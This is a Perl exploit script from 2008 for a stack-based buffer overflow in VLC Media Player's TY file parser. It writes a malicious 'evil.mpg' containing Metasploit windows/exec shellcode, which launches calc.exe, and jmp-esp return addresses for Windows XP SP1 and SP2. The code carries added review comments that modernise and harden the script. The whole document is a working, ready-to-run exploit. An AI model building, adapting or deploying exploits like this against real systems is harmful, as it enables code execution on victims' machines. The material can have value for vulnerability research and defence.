# Title : VLC Media Player TY File Stack Based Buffer Overflow Exploit
# Published : 2008-10-21
# Author : Guido Landi
#!/usr/bin/perl
# 10/21/2008 k`sOSe
use warnings;
use strict;
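# windows/exec - 141 bytes
# http://www.metasploit.com
# Metasploit windows/exec payload. The trailing ASCII bytes are
# "C:\WINDOWS\system32\calc.exe", so a successful run only pops calc.
my $shellcode =
    "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" .
    "\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" .
    "\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" .
    "\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" .
    "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" .
    "\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" .
    "\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" .
    "\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7" .
    "\x43\x3a\x5c\x57\x49\x4e\x44\x4f\x57\x53\x5c\x73\x79\x73" .
    "\x74\x65\x6d\x33\x32\x5c\x63\x61\x6c\x63\x2e\x65\x78\x65" .
    "\x00";

# Return addresses (a "jmp esp" inside shell32.dll), written little-endian.
# Indexed by the target number from the command line. These are tied to the
# exact shell32.dll build listed; any other build needs its own address.
my @targets = (
    "\x24\x11\x62\x77",   # 0: jmp esp @ shell32.dll - Win XP SP1
    "\xb3\x57\x04\x7d",   # 1: jmp esp @ shell32.dll - Win XP SP2
);

# Argument check: exactly one single-digit target that indexes @targets.
# NOTE(review): defined(@array) is a fatal compile error since Perl 5.22,
# so the array is tested directly. The upper bound follows @targets, so
# adding a target no longer requires editing this line.
usage() if !@ARGV or $ARGV[0] !~ /\A\d\z/ or $ARGV[0] > $#targets;
my $ret = $targets[$ARGV[0]];

my $junk       = "\x41";
my $chunk_size = 0x20000;      # 00 02 00 00 (the CHUNK_SIZE field) read big-endian
my $out_name   = 'evil.mpg';

# First chunk: TY file id, a CHUNK_SIZE field, an i_map_size / SEQ table
# size pair chosen so size / (i_map_size + 8) == 1, then the overflow
# string (60 filler bytes, the return address, the payload). The chunk is
# padded with $junk to exactly $chunk_size bytes; the original hard-coded
# that padding as 130835 bytes, which is 0x20000 minus the 96 bytes of
# header/filler and the 141-byte payload. Computing it keeps the layout
# intact if the payload length changes.
my $chunk1 =
    "\xF5\x46\x7A\xBD" .       # TIVO_PES_FILEID
    "\x00\x00\x00\x02" .
    "\x00\x02\x00\x00" .       # CHUNK_SIZE
    $junk x 8 .
    "\x00\x00\x05\x41" .       # i_map_size
    $junk x 4 .
    "\x00\x00\x05\x49" .       # SEQ table size / (i_map_size + 8) == 1
    $junk x 60 .
    $ret .
    $shellcode;
my $pad = $chunk_size - length $chunk1;
# "x" with a negative count silently yields "", which would corrupt the
# layout instead of failing, so refuse an oversized payload explicitly.
die "payload too large: first chunk would exceed $chunk_size bytes\n" if $pad < 0;
$chunk1 .= $junk x $pad;

# Second chunk: record headers. Each record's type is
# (subrec_type & 0x0f) << 8 | rec_type, hence the byte pairs below.
my $chunk2 =
    "\x05" .                   # i_num_recs
    $junk x 3 .
    "\x05" .                   # p_hdrs
    $junk x 1 .
    "\x09" .                   # subrec_type \ 0x9c0 -> AC-3 Audio (DTivo)
    "\xc0" .                   # rec_type    /
    $junk x 14 .
    "\x06" .                   # subrec_type \ 0x6e0 -> Series 1 Tivo
    "\xe0" .                   # rec_type    /
    $junk x 531062;

# Three-arg open, raw mode (no CRLF translation on Windows), and every I/O
# step checked: a silently truncated file is worse than no file.
open my $fh, '>', $out_name or die "open $out_name: $!\n";
binmode $fh;
print {$fh} $chunk1, $chunk2 or die "write $out_name: $!\n";
close $fh or die "close $out_name: $!\n";
print "wrote $out_name (", length($chunk1) + length($chunk2), " bytes)\n";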
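# Print the banner and target list, then exit. Output goes to STDERR and
# the exit status is non-zero: usage() is only reached on a bad command
# line, and a wrapper script must be able to tell that apart from a
# successful run (the original exited 0 on STDOUT).
sub usage
{
    my $script = $0;
    print STDERR <<"EOM";
VLC Media Player TY File Stack Based Buffer Overflow Exploit
k`sOSe - 10/21/2008
usage:
$script <target>
targets:
0 - Windows XP SP1
1 - Windows XP SP2
EOM
    exit 1;
}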